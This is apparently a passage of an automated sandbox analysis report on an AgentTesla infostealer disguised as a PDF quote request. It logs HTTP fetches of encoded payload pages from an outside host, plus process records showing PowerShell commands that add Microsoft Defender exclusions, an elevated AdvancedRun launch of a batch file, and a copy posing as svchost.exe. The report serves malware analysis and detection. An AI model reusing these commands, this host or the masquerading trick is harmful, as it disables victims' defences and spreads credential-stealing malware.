                                                                                                                                        Data Raw: 36 32 37 31 0d 0a 3c 70 3e 69 69 59 49 62 59 63 75 75 59 62 59 58 59 62 59 62 59 62 59 75 59 62 59 62 59 62 59 56 4a 4a 59 56 4a 4a 59 62 59 62 59 63 43 75 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 54 75 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 63 56 43 59 62 59 62 59 62 59 63 75 59 58 63 59 63 43 54 59 63 75 59 62 59 63 43 62 59 49 59 56 62 4a 59 58 58 59 63 43 75 59 63 59 69 54 59 56 62 4a 59 58 58 59 43 75 59 63 62 75 59 63 62 4a 59 63 63 4a 59 58 56 59 63 63 56 59 63 63 75 59 63 63 63 59 63 62 58 59 63 63 75 59 49 69 59 63 62 49 59 58 56 59 49 49 59 49 69 59 63 63 62 59 63 63 62 59 63 63 63 59 63 63 54 59 58 56 59 49 43 59 63 62 63 59 58 56 59 63 63 75 59 63 63 69 59 63 63 62 59 58 56 59 63 62 4a 59 63 63 62 59 58 56 59 54 43 59 69 49 59 43 58 59 58 56 59 63 62 49 59 63 63 63 59 63 62 62 59 63 62 63 59 75 54 59 63 58 59 63 58 59 63 62 59 58 54 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 43 62 59 54 49 59 62 59 62 59 69 54 59 63 59 58 59 62 59 69 54 59 63 75 56 59 75 63 59 63 43 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 56 56 75 59 62 59 58 75 59 62 59 63 63 59 63 59 43 62 59 62 59 62 59 63 75 56 59 63 62 59 62 59 62 59 54 59 62 59 62 59 62 59 62 59 62 59
                                                                                                                                        Data Ascii: 6271<p>iiYIbYcuuYbYXYbYbYbYuYbYbYbYVJJYVJJYbYbYcCuYbYbYbYbYbYbYbYTuYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYcVCYbYbYbYcuYXcYcCTYcuYbYcCbYIYVbJYXXYcCuYcYiTYVbJYXXYCuYcbuYcbJYccJYXVYccVYccuYcccYcbXYccuYIiYcbIYXVYIIYIiYccbYccbYcccYccTYXVYICYcbcYXVYccuYcciYccbYXVYcbJYccbYXVYTCYiIYCXYXVYcbIYcccYcbbYcbcYuTYcXYcXYcbYXTYbYbYbYbYbYbYbYCbYTIYbYbYiTYcYXYbYiTYcuVYucYcCbYbYbYbYbYbYbYbYbYVVuYbYXuYbYccYcYCbYbYbYcuVYcbYbYbYTYbYbYbYbYbY
Timestamp: Feb 25, 2021 15:16:00.770915985 CET | kBytes transferred: 9251 | Direction: OUT | Data:
GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1
Host: coroloboxorozor.com

Timestamp: Feb 25, 2021 15:16:00.853693008 CET | kBytes transferred: 9253 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:16:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d13aa7a57fad137eafa360a7b8317c40f1614262560; expires=Sat, 27-Mar-21 14:16:00 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Thu, 25 Feb 2021 07:33:05 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b25002600009d180e376000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=exf4RZrnXdy2gWsirSTwT8OU%2Ba63ir4Yw6XnN7UIfsns%2FjD78W6RXAOt0G66pPyBdUkLdVWH0A7lPeEeEKkOBpBp7x259ePgBCcC56YuakY6sEUt"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 62720aad0b629d18-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 33 34 36 37 0d 0a 3c 70 3e 59 56 75 59 63 4a 43 59 56 62 56 59 56 56 49 59 58 75 59 49 62 59 63 43 43 59 63 69 69 59 56 63 49 59 75 58 59 63 56 4a 59 63 75 4a 59 56 63 4a 59 56 58 58 59 75 75 59 63 43 4a 59 56 56 59 63 49 62 59 56 4a 63 59 63 69 58 59 56 4a 4a 59 56 58 4a 59 54 56 59 63 62 69 59 63 49 69 59 69 63 59 63 75 49 59 56 58 4a 59 75 69 59 63 63 63 59 63 49 54 59 56 4a 63 59 54 75 59 63 63 49 59 63 49 58 59 63 43 59 54 4a 59 63 54 63 59 56 49 59 56 62 49 59 54 63 59 56 58 59 56 4a 59 75 58 59 63 58 69 59 63 54 59 49 62 59 63 63 75 59 63 75 58 59 43 4a 59 63 43 62 59 56 4a 59 63 63 69 59 69 43 59 63 54 43 59 54 49 59 63 54 63 59 58 4a 59 63 62 4a 59 63 69 62 59 56 58 69 59 58 43 59 63 56 58 59 63 75 75 59 56 56 75 59 56 58 69 59 4a 63 59 63 54 58 59 56 58 49 59 56 56 54 59 56 4a 58 59 56 62 54 59 75 62 59 56 58 54 59 63 63 58 59 63 54 69 59 63 62 58 59 56 4a 58 59 63 69 4a 59 69 63 59 56 4a 4a 59 63 58 43 59 63 56 62 59 4a 4a 59 56 75 69 59 63 62 43 59 43 4a 59 63 69 59 56 4a 62 59 4a 56 59 75 49 59 69 43 59 54 4a 59 75 58 59 58 54 59 63 56 59 63 69 69 59 63 56 75 59 63 56 63 59 56 75 69 59 56 75 54 59 63 49 75 59 63 43 69 59 63 49 75 59 63 43 69 59 49 75 59 75 58 59 58 56 59 56 56 69 59 43 43 59 58 58 59 56 58 59 63 69 56 59 63 62 4a 59 4a 75 59 63 54 56 59 63 63 58 59 63 56 59 56 63 58 59 63 56 54 59 69 58 59 63 75 59 56 56 69 59 63 62 75 59 54 58 59
                                                                                                                                        Data Ascii: 3467<p>YVuYcJCYVbVYVVIYXuYIbYcCCYciiYVcIYuXYcVJYcuJYVcJYVXXYuuYcCJYVVYcIbYVJcYciXYVJJYVXJYTVYcbiYcIiYicYcuIYVXJYuiYcccYcITYVJcYTuYccIYcIXYcCYTJYcTcYVIYVbIYTcYVXYVJYuXYcXiYcTYIbYccuYcuXYCJYcCbYVJYcciYiCYcTCYTIYcTcYXJYcbJYcibYVXiYXCYcVXYcuuYVVuYVXiYJcYcTXYVXIYVVTYVJXYVbTYubYVXTYccXYcTiYcbXYVJXYciJYicYVJJYcXCYcVbYJJYVuiYcbCYCJYciYVJbYJVYuIYiCYTJYuXYXTYcVYciiYcVuYcVcYVuiYVuTYcIuYcCiYcIuYcCiYIuYuXYXVYVViYCCYXXYVXYciVYcbJYJuYcTVYccXYcVYVcXYcVTYiXYcuYVViYcbuYTXY
Timestamp: Feb 25, 2021 15:16:09.713603973 CET | kBytes transferred: 10559 | Direction: OUT | Data:
GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1
Host: coroloboxorozor.com

Timestamp: Feb 25, 2021 15:16:09.805787086 CET | kBytes transferred: 10561 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:16:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=de93ecf8568c1367fbacc36002afe58871614262569; expires=Sat, 27-Mar-21 14:16:09 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Thu, 25 Feb 2021 07:33:06 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b25231500009d180f39a000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Kqcu1d2Xs3oJZsHT98ClzdcvUzB5VFKrNMEiH9EHda0dFgjY6X0ByRdbC1ZwPWlPUovXtjymt%2BDT7etX0ElVt%2BmJaQkxn0Xu0GLIGRiXIh0f1aTq"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 62720ae4eda99d18-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 15:14:50
Start date: 25/02/2021
Path: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe'
Imagebase: 0x50000
File size: 117936 bytes
MD5 hash: C1B250F45DE606EF95AF9961496402A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 15:15:04
Start date: 25/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff641cd0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:15:14
Start date: 25/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase: 0x7ff641cd0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:15:15
Start date: 25/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase: 0x7ff641cd0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:15:16
Start date: 25/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff641cd0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:15:18
Start date: 25/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase: 0x7ff641cd0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:15:27
Start date: 25/02/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
Imagebase: 0xec0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 15:15:28
Start date: 25/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:15:28
Start date: 25/02/2021
Path: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 3%, Metadefender, Browse
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 15:15:37
Start date: 25/02/2021
Path: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 15:15:40
Start date: 25/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
Imagebase: 0x7ff662bf0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:15:42
Start date: 25/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase: 0x7ff662bf0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:15:45
Start date: 25/02/2021
Path: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
Imagebase: 0xd60000
File size: 117936 bytes
MD5 hash: C1B250F45DE606EF95AF9961496402A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 32%, ReversingLabs
                                                                                                                                        Reputation:low

                                                                                                                                        General

                                                                                                                                        Start time:15:15:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
                                                                                                                                        Imagebase:0xec0000
                                                                                                                                        File size:430592 bytes
                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:15:15:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff774ee0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:15:15:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                                                        Imagebase:0x1020000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:15:15:46
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff774ee0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:15:15:46
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:timeout 1
                                                                                                                                        Imagebase:0x10e0000
                                                                                                                                        File size:26112 bytes
                                                                                                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

Disassembly

Code Analysis
